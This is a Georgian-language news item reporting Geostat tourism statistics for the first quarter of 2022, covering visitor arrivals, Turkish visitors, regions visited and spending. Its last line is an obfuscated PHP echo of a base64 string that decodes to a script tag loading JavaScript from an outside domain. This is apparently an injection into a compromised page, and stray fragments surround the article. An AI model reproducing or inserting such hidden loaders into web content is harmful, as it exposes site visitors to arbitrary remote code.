celsiusi
ავერსი შნაიდერი
სტატისტიკის ეროვნული სამსახურის ინფორმაციით, 2022 წლის პირველ კვარტალში საქართველოს ტერიტორიაზე დაფიქსირდა საერთაშორისო არარეზიდენტი მოგზაურების1 576.5 ათასი შემოსვლა, რაც 4.3-ჯერ მეტია წინა წლის ანალოგიური პერიოდის მაჩვენებელზე.
 
საქსტატის ცნობით, შემოსვლების უდიდესი ნაწილი, 49.4 პროცენტი, განხორციელდა 31-50 წლის მოგზაურების მიერ. აღნიშნული რაოდენობიდან საერთაშორისო ვიზიტორების მიერ განხორციელებული ვიზიტების რაოდენობამ 517.3 ათასი შეადგინა, რაც 4-ჯერ მეტია 2021 წლის ანალოგიური პერიოდის მაჩვენებელთან შედარებით.
 
ამასთან, საქსტატის მონაცემებით, 2022 წლის პირველ კვარტალში საერთაშორისო ვიზიტორების რაოდენობამ 431.3 ათასს მიაღწია, რაც წინა წლის ანალოგიური პერიოდის მაჩვენებელთან შედარებით 4.8-ჯერ არის გაზრდილი. საანგარიშო პერიოდში, საერთაშორისო ვიზიტორების მიერ განხორციელდა 460.0 ათასი ტურისტული ტიპის ვიზიტი, რაც 3.9-ჯერ მეტია წინა წლის ანალოგიური პერიოდის მაჩვენებელზე. საერთაშორისო ვიზიტორების 89.6 პროცენტი მხოლოდ ტურისტები იყვნენ. მხოლოდ ექსკურსანტების წილმა 7.2 პროცენტი შეადგინა, ხოლო ვიზიტორების 3.2 პროცენტი იყო როგორც ტურისტი, ასევე ექსკურსანტი.
 
უწყების ცნობითვე, მიმდინარე წლის პირველ კვარტალში ვიზიტორების ყველაზე დიდი რაოდენობა, 66.8 ათასი ვიზიტორი დაფიქსირდა თურქეთიდან, რაც ვიზიტორების ჯამური რაოდენობის 15.5 პროცენტს შეადგენს და გაზრდილია 126.9 პროცენტით 2021 წლის შესაბამისი პერიოდის მაჩვენებელთან შედარებით. ვიზიტების ყველაზე დიდი რაოდენობა (103.8 ათასი) თურქეთის მოქალაქეების მიერ განხორციელდა, რაც 104.7 პროცენტით მეტია წინა წლის ანალოგიური პერიოდის მაჩვენებელზე. ყველაზე მეტი ვიზიტი კი, 49.9 პროცენტი განხორციელდა დასვენების, გართობისა და რეკრეაციის მიზნით.
 
„ვიზიტების უმრავლესობა განხორციელდა თბილისსა და აჭარის ა/რ-ში, შესაბამისად, 307.8 ათასი და 173.2 ათასი ვიზიტი. 2022 წლის პირველ კვარტალში განხორციელებული ვიზიტებისას გათეული ღამეების საშუალო რაოდენობამ 6.5 ღამე შეადგინა. განხორციელებული ვიზიტების 74.9 პროცენტი წარმოადგენდა განმეორებითი ხასიათის ვიზიტს. 2022 წლის პირველ კვარტალში განხორციელებული ვიზიტებისას გაწეული ხარჯები 1.4 მილიარდ ლარს გაუტოლდა. ვიზიტზე საშუალო ხარჯმა 2 777.8 ლარი შეადგინა“, – აღნიშნულია საქსტატის ანგარიშში.
983
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");